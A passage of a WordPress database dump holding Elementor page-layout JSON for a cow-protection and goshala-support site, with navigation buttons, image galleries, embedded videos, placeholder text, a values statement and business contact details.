\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9901,1661,'_elementor_page_assets','a:0:{}'),(9904,1662,'_elementor_edit_mode','builder'),(9905,1662,'_elementor_template_type','wp-page'),(9906,1662,'_elementor_version','3.7.8'),(9907,1662,'_wp_page_template','elementor_canvas'),(9908,1662,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"192\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9909,1662,'_elementor_page_assets','a:0:{}'),(9911,1663,'_elementor_edit_mode','builder'),(9912,1663,'_elementor_template_type','wp-page'),(9913,1663,'_elementor_version','3.7.8'),(9914,1663,'_wp_page_template','elementor_canvas'),(9915,1663,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About 